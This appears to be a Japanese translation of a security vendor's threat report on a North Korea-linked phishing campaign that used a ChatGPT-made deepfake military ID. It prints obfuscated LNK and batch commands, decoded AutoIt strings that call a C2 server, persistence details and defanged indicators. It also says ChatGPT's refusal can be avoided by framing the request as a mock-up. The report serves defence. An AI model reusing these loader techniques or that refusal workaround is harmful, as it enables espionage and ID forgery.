AIディープフェイクベースの韓国軍公務員身分証偽造キムスキ(Kimsuky)グループのAPTキャンペーン

◈ 重要なポイント (Key Findings)

生成AI「ChatGPT」を利用したキムスキ(Kimsuky)グループによるAPT攻撃が登場
韓国軍公務員身分証の写真をディープフェイクで偽造し、身分証発行業務として接近
バッチファイルとAutoItスクリプトを使用しアンチウイルスの回避を試みる
難読化された悪意のあるスクリプトの検出と端末のセキュリティのためにEDR導入は不可欠

1. 概要(Overview)

2025年7月17日、Genians Security Center(GSC)は、キムスキ(Kimsuky)グループが行ったと分類されたスピアフィッシング(Spear Phishing)攻撃を発見しました。これは韓国防衛機関を詐称したAPT攻撃で、公務員身分証を発行する軍関係者を装いました。

脅威アクター(Threat Actor)は生成AIであるChatGPTを使用して、見本の公務員身分証の画像を作成し、それを攻撃に使用しましたが、これはキムスキグループによる「ディープフェイク(DeepFake)」を使った実例です。

ディープフェイクは「ディープラーニング(Deep Learning)」と「フェイク(Fake)」の合成語で、人工知能(AI)技術を利用して偽の画像、映像、音声などを本物の人物のように作った技術や結果物を指す用語です。

現在は、生成AIを使用して実際の人物のように見えるようにする操作および生成されたすべてのデータを指す意味へと拡張されています。ちなみに、2017年頃に「deepfakes」というニックネームのRedditユーザーがオープンソースのディープラーニングモデルを活用し、有名人の顔をわいせつな映像に合成して共有したことが語源とされています。

本レポートの主な目的は、ディープフェイク技術が実際の攻撃シナリオにどのように活用されているかを具体的な事例を通じて観察し、それを基に脅威インサイトを導き出すとともに、セキュリティ環境に及ぼす潜在的な影響とその対応方針を提示することにあります。

2. 背景(Background)

GSCは以前「ClickFix戦術分析レポート」を公開しました。当時の内容の一部には韓国ポータル会社のセキュリティ機能を装った事例が含まれていました。

「ClickFix (クリックフィックス)」戦術を活用したキムスギ(Kimsuky)グループの脅威事例の分析

この攻撃は韓国ポータル会社のキャプチャ(reCAPTCHA)セキュリティ機能を装い、ポップアップ画面の指示に従って悪性PowerShellコマンドをだまして実行します。Genius 脅威アナリストは、当時使用されたマルウェアが防衛部門になりすました同じディープフェイク攻撃に使用されたことを確認しました。

[図2-1]攻撃シナリオ

この相関関係の研究は、このAIディープフェイクに基づく韓国軍公務員身分証偽造事件を理解するのに役立ちます。

また、Kimsukyグループは、まるで「AIがメールを代わりに管理してくれる機能」であるかのようにメールの件名をだまして受信者を惑わすなど、AIをテーマとした攻撃にも積極的に活動しています。

一方、生成AIサービス「Claude」を運営する米国のAnthropic社は、8月28日に発表した脅威インテリジェンスレポート「Detecting and counter of AI: August 2025」で、北朝鮮IT労働者によるAI悪用事例を公開しました。

レポートによると、AIを活用し精巧に操作した仮想な身分を作り、これをベースに就職活動の過程で技術評価を行ったことが確認されました。採用後、実際の技術業務もAIを活用して遂行したことが明らかになりました。レポートは、これらの活動が国際制裁を回避すると同時に、北朝鮮政権のために外貨を獲得するために緻密に設計されたことだと分析しました。

また、AIサービスがなければ、プログラミングスキルの不足または英語ベースの専門的なコミュニケーションスキルの制限により、技術面接に合格したり、仕事を続けたりすることは困難だっただろうと付け加えました。

そして、韓国の外交部また日本の外務省は日米韓「北朝鮮IT労働者に関する共同声明」を発表し、「北朝鮮IT労働者は、AIツールの活用及び外国の仲介者との協力によるものを含め、偽の身分及び所在地を活用して非北朝鮮IT労働者として自身を偽装するために、様々な手法を用いている。北朝鮮IT労働者に対する雇用、支援又は業務の外注は、知的財産、データ及び資金の窃取から、評判の悪化及び法的な結果に至るまで、深刻なリスクを一層もたらす。」ことを明らかにしました。

このように、国家が支援する脅威アクターがAIサービスを悪用し高度な攻撃活動をしているという報告が継続的に報告されています。特に北朝鮮と連携した工作員は、AIを利用して偽の身分と履歴書を生成した後、技術評価と実務の中でAIを利用する方法でのサイバー浸透作戦を行っています。

AIサービスは、仕事の生産性を向上させるための強力なツールですが、同時に国家安全保障レベルでサイバー脅威に悪用される可能性のある潜在的なリスク要因でもあります。したがって、組織内の採用·業務·運用のすべてにおいて、AIの悪用の可能性を考慮して事前に準備し、継続的なセキュリティ監視を行う必要があります。

3. 技術的分析 (Technical Analysis)

3-1. メールセキュリティ案内サービスのなりすまし - ClickFix (Case 1)

2025年6月2日、韓国ポータル会社のメールセキュリティ案内サービスをなりすました各種フィッシング攻撃が発見されました。

攻撃の主な対象は北朝鮮の研究者、北朝鮮の人権運動家、マスコミ記者などであり、主に民間で活動する北朝鮮関連の関係者が主な標的にしていました。

[図3-1]ClickFix用のフィッシングメール画面

当時確認された各メールの送信者およびリンク先は「liveml.cafe24[.]com」アドレスがコマンド制御(C2)サーバで同じでした。ちなみに受信者はそれぞれ違います。

Date	Sender	Phishing Link
2025-06-02	serv_warnq0x@liveml.cafe24[.]com	liveml.cafe24[.]com/css/img/out.php
2025-06-02	noreply_system001@liveml.cafe24[.]com	liveml.cafe24[.]com/css/img/out.php

[表 3-1] ポータル会社のメールセキュリティ案内サービスをなりすましたフィッシング情報

フィッシングメール本文の下部に埋め込まれたリンクをクリックすると、C2に接続され、ClickFixポップアップウィンドウが表示されます。そして、バックグラウンドでコピーされた悪性のPowerShellとBatchコマンドが実行されると、いくつかの段階を経て韓国の「jiwooeng.co[.]kr」C2サーバからCABファイルがダウンロードされます。

[図3-2]ClickFixポップアップ画面

CABファイルの中には、Hancom Officeのアップデートを装った「HncUpdateTray.exe」ファイルがあります。実際、このファイルは「AutoIt3.exe」であり、それに付属する「config.bin」という名前のコンパイル済みオートイトスクリプトの実行役割として使われます。このスクリプトは「jiwooeng.co[.]kr」C2サーバと定期的に通信して、攻撃意図に基づいて新しいバッチファイルコマンドを実行します。

一方、ClickFix戦術の他に、アカウント情報を盗むことを目的とした典型的なフィッシング攻撃も続きました。この時は、「liveml.cafe24[.]com」から「snuopel.cafe24[.]com」にアドレスが変更されました。

【図3-3】アカウント情報窃取用フィッシングメール画面

アカウント情報を盗むフィッシング攻撃でも、発信に使用されるメールIDパターンは同じようなパターンを持っています。

noreply_system001@liveml.cafe24[.]com
noreply_system001@snuopel.cafe24[.]com

特に、AIがメールを管理してくれている新機能の案内のように偽装した内容もあります。脅威アクター(Threat Actor)は、AI テーマを攻撃に導入して使用しました。

3-2. HWP文書の添付ファイルのなりすまし - ClickFix(Case2)

普段はセキュリティに警戒心が強いユーザーが見慣れないファイルをメールで受け取ると、不審に思ってアクセスを控えるでしょう。Advanced Persistent Threat(APT)攻撃の脅威アクターもこのようなことをよく認知しています。

したがって、攻撃の対象者の活動分野や関心事に合ったテーマで接近するのが一般的です。あるいは、セキュリティ状態が比較的低いユーザを攻撃して横展開の拠点を作り、普段の会話に介入し、自然に悪性ファイルを伝達します。

[図3-4]HWP文書の添付ファイルをなりすましたClickFix攻撃メールの画面

この事例は6月17日、特定の人物を対象に行われました。まるでHancom HWP文書を添付したかのようになりすましました。

前述のように、実際の攻撃を受けたメール受信者は、普段の知り合いからこのようなHWP文書を定期的に受信していました。それで、メール受信者はあまり疑うことなく、添付ファイルにアクセスしました。

文書ファイルは、ClickFix攻撃で使用されたC2サーバ「liveml.cafe24[.]com」のアドレスと同じで、同じ内部スクリプトコードが使用されていました。

3-3. 公務員身分証発行のなりすまし - AI DeepFake(Case3)

ClickFix戦術に続いて、7月にはOpenAIのChatGPTサービスを悪用した「ディープフェイク」の事例が発見されました。

この脅威アクターは、生成AIサービスを利用して韓国軍公務員身分証の偽の写真を作成し、試案の検討を依頼する業務のように装ったスピアフィッシング攻撃を行いました。

メールの送信者は実際の韓国軍の機関の公式ドメインアドレスに見えるよう似たようなもので作りました。

【図3-5】韓国軍公務員身分証の試案検討依頼になりすました攻撃画面

メールには以下の情報が含まれており、ダウンロードされた圧縮ファイルには受信者の実名(*処理)が記載されています。

発信先
- uws64-116.cafe24[.]com
  - 183.111.161[.]96 (KR)
添付ファイルリンク
- Versonnex74[.]fr
  - 51.158.21[.] 1 (フランス)
ダウンロードファイル
- 公務員証試案(***).zip

「公務員証試案(***).zip」圧縮の内部には、「公務員証試案(***).lnk」という名前に典型的なショートカットタイプの悪意のあるファイルが含まれています。ショートカットプロパティのTargetコマンドは、cmd.exeプロンプトとして機能します。まず、「ab901ab」値の環境変数に長い文字列が宣言されています。次に、スライス(Slicing)構文で難読化された文字列を1つずつ抽出します。

%windir%\syswow64\cmd.exe
- /k "ab901ab= を設定
  - jBdv8X7pIwSzV5s62otf9Pk1WaeAyc4OuERbi30lxmUnZYrh

例えば、「%ab901ab:~7,1%」という値で[~7,1]の意味は環境変数文字列の左側(0番)から7番目に該当する文字列(p)を選択します。このように順次敵に文字を抽出して変換します。

jBdv8X7pIwSzV5s62otf9Pk1WaeAyc4OuERbi30lxmUnZYrh
&& call %ab901ab:~7,1%%ab901ab:~17,1%%ab901ab:~9,1%%ab901ab:~26,1%%ab901ab:~46,1%%ab901ab:~14,1%%ab901ab:~47,1%%ab901ab:~26,1%%ab901ab:~39,1%%ab901ab:~39,1%
ab901ab:	~7,1	p
	~17,1	o
	~9,1	w
	~26,1	e
	~46,1	r
	~14,1	s
	~47,1	h
	~26,1	e
	~39,1	l
	~39,1	l

[表3-2] ショートカットプロパティに含まれた難読化された文字列の抽出

変換された文字列は、PowerShell コマンド「jiwooeng.co[.]kr」アドレスの「private.php」C2サーバに通信を試みます。

[図3-6] 抽出された文字列の画面

C2サーバと通信すると、「公務員証試案(***).png」写真と「LhUdPC3G.bat」ファイルが一時フォルダ(%Temp%)パスにダウンロードされ実行されます。

この時受け取った公務員証の試案になりすました画像ファイルは、インターネットに公開された一部の写真と比較した結果、似たように作成されたディープフェイク写真と分析されました。

特にファイルのメタデータを確認すると、生成AI「ChatGPT」で作成されたことが確認できます。

[図3-7]PNG ファイルのメタデータ (一部のモザイク加工)

韓国軍公務員身分証は法律で厳しく保護されている公的身分証明書であるため、実物と同一または類似した形でコピーをすることは違法に該当します。そのため、ChatGPTに身分証明書のコピーを作ってほしいと頼むと「できない」と応答します。

ただし、AI モデルが反応できるように、プロンプト(Prompt)やペルソナ(Persona)役割の設定に応じて、応答は異なります。実際の韓国軍公務員身分証のコピーではなく、合法的な目的の試案(Mock-up)またはサンプル用途の仮想デザインの作成を依頼する方法です。

実際攻撃に使用されたディープフェイク写真にもこれに当てはまります。AIサービスを通じて偽の身分証明書を作成することは技術的に難しくないため、特に注意が必要です。

[図3-8]AIが作成した仮想人物の身分証(一部モザイク加工)

攻撃に使用された「公務員証試案(***).png」ファイルをTruthscan ディープフェイク検出サービスで分析すると、ディープフェイク写真の 98% であることが判明しました。

[図3-9]TruthScan ディープフェイク検索結果 (一部モザイク加工)

このように、実際の業務や関連するトピック、おとり(Decoy)を通じて、より精巧な攻撃が可能となります。

一方、写真と一緒にインストールされた「LhUdPC3G.bat」ファイルが実行され、本格的な悪意行為を実行します。このファイルも、上記のショートカットファイルと同様に、難読化された文字を環境変数で1つずつ抽出して実行します。

[図3-10] 難読化されたバッチファイル

内部ブランチジャンプ用の識別子として使用された「Start_juice」と「Eextract_juice」文字列は、同様のケースで引き続き発見されています。これとは別に、この内容は「脅威の帰属(Threat Attribution)」及び相関分析に使用されます。

難読化されたバッチスクリプトは、%headerurl%変数で宣言された「jiwooeng.co[.]kr」C2サーバの「private.php?public=admin38」アドレスに7秒後接続を試みます。もし、通信に成功したら、「privname173.cab」ファイルを%Public%パスにダウンロードし、比較条件に従って解凍します。

そして、「HncAutoUpdateTaskMachine」という名前でタスクスケジューラに登録し、Hancom Officeのアップデートに偽装して実行します。

C:\ProgramData\HncAutoUpdate\HncUpdateTray.exe
- C:\ProgramData\HncAutoUpdate\config.bin

[図3-11] 実行のダイアグラム

タスクスケジューラによって7分ごとに繰り返される「HncUpdateTray.exe」ファイルは、同じパスに「config.bin」ファイルをロードします。

「HncUpdateTray.exe」ファイルのアイコン画面のように、原本は「AutoIt3.exe」です。そして「config.bin」ファイルはCompiled AutoIt Scripts構造をもっています。

[図3-12]AutoItファイルの構造

逆コンパイルされたオートイトスクリプトは、分析の妨害と検知回避のために関数と文字列を難読化しました。

ここでの 'msdbvxez()' 関数は、循環キーとビットの周期配列を利用して入力文字列 [+/-] の各文字をシフトする「ビズネル(Vigenère)」変形方式で実装された文字ごとの暗号化技術です。

単純な「シーザー暗号(Caesar cipher)」に比べて難読化のレベルが向上し、静的文字列を分析する際に一般的な文字パターンを予測しにくく設計されました。

[図3-13] 難読化された文字列と復号化ロジック

難読化された文字列をデコードすると、韓国のC2サーバと通信し、GET応答を待機します。

Local $bxmfljmg = "ADODB.Stream"

Local $ndexqvwc = "windows-1252"

Local $izscpxux = "MSXML2.DOMDocument.6.0"

Local $khabtatx = "b64"

Local $lfqwxybb = "bin.base64"

Local $nmpogecn = "WinHttp.WinHttpRequest.5.1"

Local $iugrncsl = "GET"

Local $vvajpije = "User-Agent"

Local $qcffuoke = "COMPUTERNAME"

Local $pzqvxcmw = "http://www.jiwooeng.co[.]kr/zb41pl7/bbs/icon/private_name/private.php?name="

Local $zkczmqub = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/133.2.1.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"

Local $tmylhlop = "\tempprivate0082.bat"

Local $tjpvtfse = "<html"

[表3-3] 難読化された文字列のデコード結果

最終的にロードされた「config.bin」スクリプトは、「COMPUTERNAME」という値で感染したエンドポイントを区別し、偵察プロセスを通じて追加のターゲットを選択します。

その後、「tempprivate0082.bat」ファイルを追加でインストールし、内部資料の奪取や遠隔制御など、様々な脅威行為を行うことができます。

4. 類似事例分析(Similar case analysis)

4-1. 南北統一学術研究機関の詐称事例

2月11日、韓国の南北関係を研究する統一学術研究機関を詐称して行われたスピアフィッシング攻撃です。

当時この攻撃には、記事文を装ったZIP圧縮内に悪意のあるLNKを含めて送りました。ダウンロードに使用された C2 アドレスは「guideline.or[.]kr」です。

【図4-1】記事文のなりすましスピアフィッシング画面

LNKファイルの内部には「ms3360.bat」ファイルが含まれており、このバッチファイルは前述のディープフェイクのケースと似たようなパターンを持っています。

[図4-2] バッチファイル内の命令文

環境変数の値はディープフェイクの値とは異なりますが、難読化方法は同じで、「Start_juice」と「Eextract_juice」の分岐設定も同じです。

難読化されたバッチスクリプトは、%themeaddr%変数として宣言された「hyounwoolab[.]com」C2サーバの「push_pass.php?pass=push」アドレスに10秒遅延した後、接続を試みます。もし通信が成功したら、「MStemp109.cab」ファイルを%Public%パスにダウンロードした後、比較条件に従って圧縮を解除します。

そして、「MicrosoftAppStoreTaskMachone」という名前のタスクスケジューラを登録し、MS AppStoreのように偽装して実行します。

C:\ProgramData\MicrosoftStore\MicrosoftAppStore.exe
- C:\ProgramData\MicrosoftStore\account.conf

ここまではディープフェイクの事例と似たような流れですが、「MicrosoftAppStore.exe」ファイルがAutoItスクリプトが読み込む形態ではありません。

この時は、No Console Window用のPythonと呼ばれる「pythonw.exe」の2.7バージョンが攻撃に使用されました。そしてaccount.confファイルは、「コメントカムフラージュ(Comment Camouflage)」または「パディング難読化(Padding Obfuscation)」の手法を使用します。

[図4-3] コメントの間に隠されたコマンド

「pythonw.exe」は、Python スクリプトを実行したときにコンソール (cmd) ウィンドウを画面に表示しない実行ファイルです。したがって、悪意のあるスクリプトを裏でこっそり実行することができます。悪意のあるスクリプトには、多数のコメント(#)を含め、まるで無害なログ/設定ファイルを装ってますが、コメントではなくPythonコードを介して悪意のあるスクリプトが実行されます。

このPythonコードは、「chr(number^number)」の10進数文字列をXORする難読化(XOR-based String Obfuscation)手法を使用し、コードの実行中に動的に生成されるランタイム復号化(Runtime Deobfuscation)手法を使用します。

このようなダミー(Dummy)変数名とコメント用文字列の偽装のため、コードだけを見てもすぐに意味を解釈することは難しいです。このように、可読性が低下し、分析に時間がかかる可能性があります。このPythonコマンドは「hyounwoolab[.]com」C2 サーバを介して「zarokey291.bat」ファイルを追加でインストールすることになります。

4-2. Pythonコメントの偽装による悪意のある行為の隠ぺい戦術

前述のコンソールレスPythonと、コメント (#) 文字列でコアコードを非表示にするために使用された別の例を見てみます。ちなみに「MicrosoftAppStore.exe」で同じファイル名を使った事例がありますが、「account.conf」ではなく「appstore.version」が使われた違いがあります。

初期アクセス(Initial Access)は大体スピアフィッシング攻撃によって実行され、CAB ファイルをダウンロードします。

No	Date	File Name	Type	C2
1	2018-05-01	notepad.exe	pythonw.exe	-
	2024-12-04	notepad.cfg	malware	-
	2024-12-07	notepad.dat	malware	dangol[.]pro
2	2018-05-01	MicrosoftAppStore.exe	pythonw.exe
2	2025-02-04	appstore.version	malware	astaibs.co[.]kr
3	2018-05-01	KMSAutoToolKit.exe	pythonw.exe
3	2025-02-18	toolkit.kit	malware	zabel-partners[.]com
4	2018-05-01	OnedriveAutoLoggin.exe	pythonw.exe
4	2025-03-10	account.ini	malware	healthindustry.sookmyung.ac[.]kr

[表4-1]CAB圧縮ファイル別の内部ファイルリストと比較情報

特に、[表 4-1] No.1のCAB ファイルは「hyounwoolab[.]com」C2 サーバを介して設置されました。圧縮内部に含まれた「notepad.cfg」Pythonスクリプトの場合、コメント文字列機能は以前と同じであるが、文字列難読化手法がもう少し複雑に実装されています。まとめると、「xbbPU2_2JjSsOHg」変数のBASE64エンコーディングデータを0~44インデックスを引いた値の逆順に抽出してデコードします。

デコード後に出てくるPythonコマンドは、「notepad.dat」ファイルをXOR演算して実行可能ファイル構造に変換してメモリに割り当てる典型的なインメモリシェルコードローダー(in-memory shellcode loader) です。

ちなみに、他のファイルとフォルダはすべて通常のPythonモジュールです。

[図4-4] notepad.datファイル作成フォルダと呼び出しフロー

シェルコードは、32ビット互換システムフォルダー(%windir%\SysWOW64)からランダムに選択された正常な EXE ファイルに挿入(Injection)されます。

通常この方法を「プロセスハロウイング(Process Hollowing)」技術と呼びます。

[図4-5] シェルコード挿入のデバッグ分析の画面

正常のプロセスに挿入されたマルウェアは、2つのC2 サーバへの接続を試みます。

dangol[.]pro/bbs/option.php
api.pcloud[.]com?folderid=24008549953&auth=rPgir7ZJwas7ZkpEjjbqOnemSy65nfFpQiS369GTy

「dangol[.]pro」、「pcloud[.]com」の複数のアドレスを使用します。もし、1つのサーバが遮断されても一定期間維持が可能な一種のフェイルオーバー(Failover)ベースのC2インフラ設計です。

[図4-6]C2 アドレス画面

5. 脅威の帰属 (Threat Attribution)

5-1. 概念

「脅威の帰属」とは、特定の脅威アクター、国や組織、または特定の攻撃キャンペーンと関連付けるプロセスを意味します。これは、単に技術的な痕跡の確認を超え、攻撃の背後にある背力とその動機を特定する重要な分析手順です。

テクニカル指標(Technical Indicators:TTP、マルウェア、インフラ)と文脈指標(Contextual Indicators: 攻撃対象、言語特性、過去の活動履歴)を総合的に分析して作られています。

この多面的な分析を通じて、特定の脅威グループに関連付けることができます。もちろん、最も重要なのは、信頼できる大規模な独立した証拠データ(IoCs、マルウェアサンプル、ログなど)を入手し、これらを体系的に分析·蓄積することです。

これは、脅威の帰属の精度と信頼性を高める根拠となります。

主要項目 (Key Components of Threat Attribution)

- TTPs (Tactics, Techniques, and Procedures)

- - 攻撃者が使用する戦術、手法、手順などの行動パターン

- - 独自の難読化技術、C2通信手法、横展開パターンなど

- Malware and Tools

- - マルウェアの種類と暗号化アルゴリズム、フレームワーク、およびそれらを使用するためのツール

- - RAT、ハッシュ、難読化技術、オープンソースまたは商用ハッキングツール

- Infrastructure

- - ドメイン、IP、サーバ、証明書など攻撃に使用されたインフラストラクチャ

- - OS、WebShell、SNS、メールおよびホスティング加入情報
  - キャンペーン間で共有およびリサイクルするか同じグループ内で繰り返し使用される

- Targeting and Victimology

- - 主に攻撃される業界、地域、組織の種類

- - 金融部門、防衛部門、特定の国家機関など

- - 動機の特定(秘密の窃盗、金銭の取得、脅迫、スパイ活動)

- Language, Code Style, Metadata, Decoy File

- - 開発環境および文化、言語特性からの手がかり

- - 国固有のソフトウェア特性、ファイル形式(HWP、EGG)

- - コードコメント表現、ビルド時間、PDBパス、アカウント名

- - 主な活動または開発時間(タイムゾーン)

- - アーティファクトマテリアル

- Historical Campaigns

- - 過去の攻撃活動との継続性とリサイクルの有無

- - 同じグループが繰り返し使用する攻撃手法

- - マルウェアファミリー、インフラストラクチャの使用パターンなど

- - OPSEC Failの調査 (セキュリティ維持失敗、拠点露出)

5-2. 相関関係の再構成

類似のケースに基づいて相関画面を構成すると、多くの個々のセキュリティイベントが関係チャートの形式で視覚化されます。各ノードはセキュリティの問題またはセキュリティ侵害インジケーター(IoC)を表し、ノード間の接続線は、行為的·時間的な相関関係または共通のデータをベースとします。

これらの関係図は、個々のイベントの断片的な観察ではなく、イベント間の相関関係を通じて攻撃シナリオを追跡したり、脅威グループの戦術を理解したりするのに役立ちます。ただし、画面に表示されるすべての問題の詳細には制限があるため、必要に応じて、各ノードに接続されているデータを表示して、過去の発生履歴や関連する脅威インテリジェンス (TI) を確認できます。

これにより、現在観察されているイベントが特定の過去の攻撃キャンペーンに関連しているのか、それとも繰り返し発生する戦術、手法、手順の一部なのかを検証することができます。

また、ディープフェイクを含む本レポートの多くの事例は、キムスキ(Kimsuky)グループが過去に使用した脅威指標と相関していることを確認しました。

【図5-1】セキュリティ侵害インジケーターベースの相関関係図

5-3. 攻撃に使用された主なおとり(Decoy)ファイル

攻撃者はディープフェイク身分証だけでなく、さまざまな形式のおとり文書も利用しました。

代表的な例としては、▷北朝鮮の為替レートと物価上昇の原因予測資料、▷ユンソクヨル政府の戒厳令宣言を通じて内戦疑惑の真相を明らかにするための国家調査結果報告などがあります。

こうした攻撃は北韓に対する研究、国防、政治·社会的に敏感な事案をテーマに、対象者の関心を誘発し、惑わす特徴を示しています。

[図5-2] おとり文書の一部画面

6. 結論と対応 (Conclusion)

Genian EDR管理者は、LNK(Windows Shortcut)ファイルが内部エンドポイントに侵入した最初の段階から脅威として識別し、すぐに検出できます。

解凍プロセス(Bandizip.exe)が実行されると、韓国軍公務員身分証を装った悪意のあるペイロードが生成されると、異常な動作基盤の検出ルール(XBA)によって脅威イベントとして識別および報告されます。

[図6-1]Genian EDRの脅威管理画面

LNK ファイルが実行されると、powershell.exe プロセスを通じてコマンドcmd.exeが呼び出され、C2サーバからディープフェイク画像ファイルと悪意のあるバッチスクリプトをダウンロードして実行します。

[図6-2]PowerShellのコマンドライン

追加でダウンロードされた悪意のあるバッチファイルは、実行時に「timeout -t 7 /nobreak」コマンドを呼び出し、プロセスの実行を約7秒間遅らせます。

このような手法は、プロセスベースのサンドボックスや動的分析環境での短期的な監視を回避するための遅延戦術として一般的に利用されています。ただし、Genian EDR は、時間遅延の有無にかかわらず実行チェーン全体を追跡および分析できるため、バイパス手法を無力化することができます。

[図6-3]Genian EDR の攻撃ストーリーライン

Genian EDRの攻撃ストーリーラインは、マルウェアの実行フロー全体を可視化し、SOC(Security Operations Center)オペレーターが脅威的な行動を迅速に特定し、即座に対応するための措置を講じることを可能にします。

7.セキュリティ侵害インジケーター (IoC, Indicator of Compromise)

09dabe5ab566e50ab4526504345af297

33c97fc4eacd73addbae9e6cde54a77d

143d845b6bae947998c3c8d3eb62c3af

8684e5935d9ce47df2da77af7b9d93fb

90026c2dbdb294b13fd03da2be011dd1

472610c4c684cea1b4af36f794eedcb0

227973069e288943021e4c8010a94b3c

bd0e6e02814cf6dcfda9c3c232987756

eacf377577cfebe882d215be9515fd11

fcb97f87905a33af565b0a4f4e884d61

1b2e63ca745043b9427153dc2d4d4635

009bb71299a4f74fe00cf7b8cd26fdfc

Domain

liveml.cafe24[.]com

snuopel.cafe24[.]com

versonnex74[.]fr

seytroux[.]fr

contamine-sarzin[.]fr

jiwooeng.co[.]kr

guideline.or[.]kr

hyounwoolab[.]com

dangol[.]pro

astaibs.co[.]kr

zabel-partners[.]com

healthindustry.sookmyung.ac[.]kr

183.111.161[.]96

183.111.182[.]195

183.111.174[.]34

183.111.174[.]97

184.168.108[.]207

51.158.21[.]1

58.229.208[.]146

59.25.184[.]83

111.92.189[.]12

112.175.184[.]4

121.254.129[.]86